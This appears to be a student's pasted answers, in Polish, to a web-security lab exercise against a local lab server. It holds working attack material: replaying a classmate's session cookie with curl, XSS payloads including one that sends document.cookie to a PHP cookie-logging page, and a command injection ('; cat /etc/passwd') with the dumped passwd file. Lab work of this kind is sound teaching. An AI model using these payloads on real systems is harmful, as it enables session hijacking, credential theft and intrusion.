
Untitled

a guest
Jan 18th, 2018
  1. Zad 1
  2. 1. -
  3. 2. -
  4. 3. -
  5. 4. GET /1/ciasteczko.php HTTP/1.1
  6. Host: 192.168.158.106
  7. User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
  8. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  9. Accept-Language: en-US,en;q=0.5
  10. Accept-Encoding: gzip, deflate
  11. Referer: http://192.168.158.106/1/
  12. Connection: keep-alive
  13. Upgrade-Insecure-Requests: 1
  14.  
  15. HTTP/1.1 200 OK
  16. Date: Thu, 18 Jan 2018 09:37:17 GMT
  17. Server: Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.12 OpenSSL/1.0.1f
  18. X-Powered-By: PHP/5.5.9-1ubuntu4.12
  19. Set-Cookie: uzytkownik=jan; expires=Thu, 18-Jan-2018 09:37:35 GMT; Max-Age=18; path=/
  20. Vary: Accept-Encoding
  21. Content-Encoding: gzip
  22. Content-Length: 88
  23. Connection: close
  24. Content-Type: text/html
  25.  
  26. 5. GET /1/ciasteczko.php HTTP/1.1
  27. Host: 192.168.158.106
  28. User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
  29. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  30. Accept-Language: en-US,en;q=0.5
  31. Accept-Encoding: gzip, deflate
  32. Referer: http://192.168.158.106/1/
  33. Cookie: JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3
  34. Connection: keep-alive
  35. Upgrade-Insecure-Requests: 1
  36.  
  37. HTTP/1.1 200 OK
  38. Date: Thu, 18 Jan 2018 09:49:59 GMT
  39. Server: Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.12 OpenSSL/1.0.1f
  40. X-Powered-By: PHP/5.5.9-1ubuntu4.12
  41. Set-Cookie: uzytkownik=jan; expires=Thu, 18-Jan-2018 09:50:17 GMT; Max-Age=18; path=/
  42. Vary: Accept-Encoding
  43. Content-Encoding: gzip
  44. Content-Length: 88
  45. Connection: close
  46. Content-Type: text/html
  47.  
  48.  
  49. <html>
  50. <body>
  51.  
  52. Ciasteczko 'uzytkownik' nie jest ustawione.
  53. </body>
  54. </html>
  55.  
  56. ********************************************************
  57.  
  58. GET /1/ HTTP/1.1
  59. Host: 192.168.158.106
  60. User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
  61. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  62. Accept-Language: en-US,en;q=0.5
  63. Accept-Encoding: gzip, deflate
  64. Referer: http://192.168.158.106/
  65. Cookie: JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3; uzytkownik=jan
  66. Connection: keep-alive
  67. Upgrade-Insecure-Requests: 1
  68.  
  69. HTTP/1.1 200 OK
  70. Date: Thu, 18 Jan 2018 09:50:07 GMT
  71. Server: Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.12 OpenSSL/1.0.1f
  72. Vary: Accept-Encoding
  73. Content-Encoding: gzip
  74. Content-Length: 421
  75. Connection: close
  76. Content-Type: text/html;charset=UTF-8
  77.  
  78. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
  79. <html>
  80. <head>
  81. <title>Index of /1</title>
  82. </head>
  83. <body>
  84. <h1>Index of /1</h1>
  85. <table>
  86. <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
  87. <tr><th colspan="5"><hr></th></tr>
  88. <tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr>
  89. <tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="ciasteczko.php">ciasteczko.php</a></td><td align="right">2018-01-17 19:10 </td><td align="right">379 </td><td>&nbsp;</td></tr>
  90. <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="ciasteczko.txt">ciasteczko.txt</a></td><td align="right">2018-01-17 19:10 </td><td align="right">379 </td><td>&nbsp;</td></tr>
  91. <tr><th colspan="5"><hr></th></tr>
  92. </table>
  93. </body></html>
  94.  
  95. *****************************************************
  96. GET /1/ciasteczko.php HTTP/1.1
  97. Host: 192.168.158.106
  98. User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
  99. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  100. Accept-Language: en-US,en;q=0.5
  101. Accept-Encoding: gzip, deflate
  102. Referer: http://192.168.158.106/1/
  103. Cookie: JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3; uzytkownik=jan
  104. Connection: keep-alive
  105. Upgrade-Insecure-Requests: 1
  106.  
  107. HTTP/1.1 200 OK
  108. Date: Thu, 18 Jan 2018 09:50:08 GMT
  109. Server: Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.12 OpenSSL/1.0.1f
  110. X-Powered-By: PHP/5.5.9-1ubuntu4.12
  111. Set-Cookie: uzytkownik=jan; expires=Thu, 18-Jan-2018 09:50:26 GMT; Max-Age=18; path=/
  112. Vary: Accept-Encoding
  113. Content-Encoding: gzip
  114. Content-Length: 102
  115. Connection: close
  116. Content-Type: text/html
  117.  
  118.  
  119. <html>
  120. <body>
  121.  
  122. Ciasteczko 'uzytkownik' jest ustawione.<br>Wartosc to 'jan'
  123. </body>
  124. </html>
  125. ***************************************************************
  126.  
  127.  
  128.  
  129. <html>
  130. <body>
  131.  
  132. Ciasteczko 'uzytkownik' nie jest ustawione.
  133. </body>
  134. </html>
  135.  
  136.  
  137.  
  138. 6.
  139. <?php
  140. $nazwa = "uzytkownik";
  141. $wartosc = "jan";
  142. setcookie($nazwa, $wartosc, time() + 18, "/");
  143. ?>
  144.  
  145. <html>
  146. <body>
  147.  
  148. <?php
  149. if(!isset($_COOKIE[$nazwa])) {
  150. echo "Ciasteczko '" . $nazwa . "' nie jest ustawione.";
  151. } else {
  152. echo "Ciasteczko '" . $nazwa . "' jest ustawione.<br>";
  153. echo "Wartosc to '" . $_COOKIE[$nazwa] . "'";
  154. }
  155. ?>
  156.  
  157. </body>
  158. </html>
  159.  
  160. 7. patrz 5
  161. 8. -
  162.  
  163.  
  164.  
  165.  
  166.  
  167.  
  168.  
  169.  
  170.  
  171.  
  172.  
  173. Zad 2
  174. 1.
  175. Sesja rozpoczeta.
  176. JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3
  177. Kolor: przezroczysty
  178.  
  179. 2.
  180. JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3
  181. Kolor: przezroczysty
  182.  
  183. 3.
  184. Kolor: zolty.
  185.  
  186. 4.
  187. JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3
  188. Kolor: zolty
  189.  
  190. 5.
  191. Sesja zakonczona
  192.  
  193. JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3
  194. Kolor:
  195.  
  196. 6.
  197. curl --header "Cookie:JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3" http://192.168.158.106/2/2-wyswietl-zmienne.php
  198.  
  199. C:\Users\student>curl --header "Cookie:JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3" http://192.168.158.106/2/2-wyswietl-zmienne.php
  200.  
  201. <!DOCTYPE html>
  202. <html>
  203.  
  204. <body>
  205.  
  206. JSESSIONID=7a3iejqr25kl1oskl9hil4oeh3<br>Kolor: zolty<br>
  207. <br>
  208. <a href=".">Powrot</a>
  209. </body>
  210.  
  211. </html>
  212.  
  213. 7.
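  214. JSESSIONID=ns0mgqb30ci7fuu39ca7vh4nq5 -- identyfikator sesji kolegi; sam identyfikator wystarcza, zeby serwer zwrocil zmienne jego sesji (patrz odpowiedz ponizej)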
  215.  
  216. C:\Users\student>curl --header "Cookie:JSESSIONID=ns0mgqb30ci7fuu39ca7vh4nq5" http://192.168.158.106/2/2-wyswietl-zmienne.php
  217.  
  218. <!DOCTYPE html>
  219. <html>
  220.  
  221. <body>
  222.  
  223. JSESSIONID=ns0mgqb30ci7fuu39ca7vh4nq5<br>Kolor: asdasd
  224. <br>
  225. <br>
  226. <a href=".">Powrot</a>
  227. </body>
  228.  
  229. </html>
  230.  
  231. 8.
  232. -
  233.  
  234.  
  235.  
  236.  
  237.  
  238.  
  239.  
  240.  
  241. Zad 3
  242. 1.
  243. Witaj Grzegorz.
  244. Masz 21 lat(a).
  245.  
  246. 2. wyskoczylo okno alert - wpisany skrypt wykonal sie w przegladarce, czyli strona jest podatna na XSS
  247.  
  248. 3.
  249. Witaj <script>alert(1)</script>.
  250. Masz 21 lat(a)
  251.  
  252. 4. -
  253.  
  254.  
  255.  
  256.  
  257. Zad 4
  258. 1.
  259. Ciasteczko: 7a3iejqr25kl1oskl9hil4oeh3
  260.  
  261. plik:
  262. <html>
  263. <body>
  264.  
  265. <?php
  266. echo "Ciasteczko: " . $_COOKIE['JSESSIONID'] . "<br>";
  267.  
  268. $handle=fopen("ciasteczka.txt","a");
  269. fputs($handle, date("Y-m-d H:i:s ") . $_SERVER["REMOTE_ADDR"] . " " . $_COOKIE['JSESSIONID']."\n");
  270. fclose($handle);
  271.  
  272. ?>
  273.  
  274. </body>
  275.  
  276.  
  277. 2.
  278. 2018-01-18 11:20:19 192.168.160.188 7a3iejqr25kl1oskl9hil4oeh3
  279. </html>
  280.  
  281.  
  282.  
  283.  
  284. 3.
  285. <script>
  286. S=new String();S="http://192.168158.106/4/przechwyc.php" + document.cookie;
  287. XSS=new Image();
  288. XSS.src=S;
  289. </script>
  290.  
  291. 4.
  292. 2018-01-18 11:25:10 192.168.160.188 7a3iejqr25kl1oskl9hil4oeh3
  293.  
  294.  
  295. 5.???????
  296.  
  297.  
  298.  
  299.  
  300. Zad 5
  301. 1.
  302. serwer pingnolem:
  303. PING 192.168.158.106 (192.168.158.106) 56(84) bytes of data.
  304. 64 bytes from 192.168.158.106: icmp_seq=1 ttl=255 time=1.19 ms
  305. 64 bytes from 192.168.158.106: icmp_seq=2 ttl=255 time=1.33 ms
  306.  
  307. --- 192.168.158.106 ping statistics ---
  308. 2 packets transmitted, 2 received, 0% packet loss, time 1001ms
  309. rtt min/avg/max/mdev = 1.196/1.264/1.332/0.068 ms
  310.  
  311. 2.
  312. 192.168.158.106; cat /etc/passwd
  313. PING 192.168.158.106 (192.168.158.106) 56(84) bytes of data.
  314. 64 bytes from 192.168.158.106: icmp_seq=1 ttl=255 time=1.33 ms
  315. 64 bytes from 192.168.158.106: icmp_seq=2 ttl=255 time=1.38 ms
  316.  
  317. --- 192.168.158.106 ping statistics ---
  318. 2 packets transmitted, 2 received, 0% packet loss, time 1001ms
  319. rtt min/avg/max/mdev = 1.333/1.357/1.382/0.044 ms
  320. root:x:0:0:root:/root:/bin/bash
  321. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  322. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  323. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  324. sync:x:4:65534:sync:/bin:/bin/sync
  325. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  326. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  327. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  328. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  329. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  330. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  331. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  332. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  333. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  334. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  335. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  336. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  337. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  338. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  339. syslog:x:101:103::/home/syslog:/bin/false
  340. messagebus:x:102:105::/var/run/dbus:/bin/false
  341. avahi-autoipd:x:103:106:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
  342. whoopsie:x:104:110::/nonexistent:/bin/false
  343. usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false
  344. kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
  345. rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
  346. speech-dispatcher:x:108:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
  347. colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
  348. lightdm:x:110:118:Light Display Manager:/var/lib/lightdm:/bin/false
  349. avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
  350. hplip:x:112:7:HPLIP system user,,,:/var/run/hplip:/bin/false
  351. pulse:x:113:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
  352. saned:x:114:123::/home/saned:/bin/false
  353. f5:x:1000:1000:Xubuntu,,,:/home/f5:/bin/bash
  354. bind:x:115:125::/var/cache/bind:/bin/false
  355. tomcat7:x:116:126::/usr/share/tomcat7:/bin/false
  356. dnsmasq:x:117:65534:dnsmasq,,,:/var/lib/misc:/bin/false
  357. freerad:x:118:127::/etc/freeradius:/bin/false
  358. mysql:x:119:128:MySQL Server,,,:/nonexistent:/bin/false
  359. sshd:x:120:65534::/var/run/sshd:/usr/sbin/nologin
  360. ntp:x:121:129::/home/ntp:/bin/false
  361.  
  362.  
  363. 3.
  364.  
  365.  
  366. PING 192.168.158.106 (192.168.158.106) 56(84) bytes of data.
  367. 64 bytes from 192.168.158.106: icmp_seq=1 ttl=255 time=1.46 ms
  368. 64 bytes from 192.168.158.106: icmp_seq=2 ttl=255 time=1.53 ms
  369.  
  370. --- 192.168.158.106 ping statistics ---
  371. 2 packets transmitted, 2 received, 0% packet loss, time 1001ms
  372. rtt min/avg/max/mdev = 1.464/1.500/1.536/0.036 ms
  373. root:x:0:0:root:/root:/bin/bash
  374. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  375. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  376. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  377. sync:x:4:65534:sync:/bin:/bin/sync
  378. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  379. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  380. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  381. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  382. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  383. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  384. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  385. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  386. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  387. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  388. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  389. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  390. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  391. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  392. syslog:x:101:103::/home/syslog:/bin/false
  393. messagebus:x:102:105::/var/run/dbus:/bin/false
  394. avahi-autoipd:x:103:106:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
  395. whoopsie:x:104:110::/nonexistent:/bin/false
  396. usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false
  397. kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
  398. rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
  399. speech-dispatcher:x:108:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
  400. colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
  401. lightdm:x:110:118:Light Display Manager:/var/lib/lightdm:/bin/false
  402. avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
  403. hplip:x:112:7:HPLIP system user,,,:/var/run/hplip:/bin/false
  404. pulse:x:113:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
  405. saned:x:114:123::/home/saned:/bin/false
  406. f5:x:1000:1000:Xubuntu,,,:/home/f5:/bin/bash
  407. bind:x:115:125::/var/cache/bind:/bin/false
  408. tomcat7:x:116:126::/usr/share/tomcat7:/bin/false
  409. dnsmasq:x:117:65534:dnsmasq,,,:/var/lib/misc:/bin/false
  410. freerad:x:118:127::/etc/freeradius:/bin/false
  411. mysql:x:119:128:MySQL Server,,,:/nonexistent:/bin/false
  412. sshd:x:120:65534::/var/run/sshd:/usr/sbin/nologin
  413. ntp:x:121:129::/home/ntp:/bin/false
  414.  
  415.  
  416. TEN SERWER TEZ ODPOWIEDZIAL Z XSSEM!!!!!!!!!!!!!!
  417.  
  418.  
  419. Zad 6
  420. 1.
  421. plik testowy wewnatrz napis: test3
  422.  
  423.  
  424. 2.
  425. Transakcja odrzucona przez polityke BSS.
  426.  
  427. ID: 10960292571254886830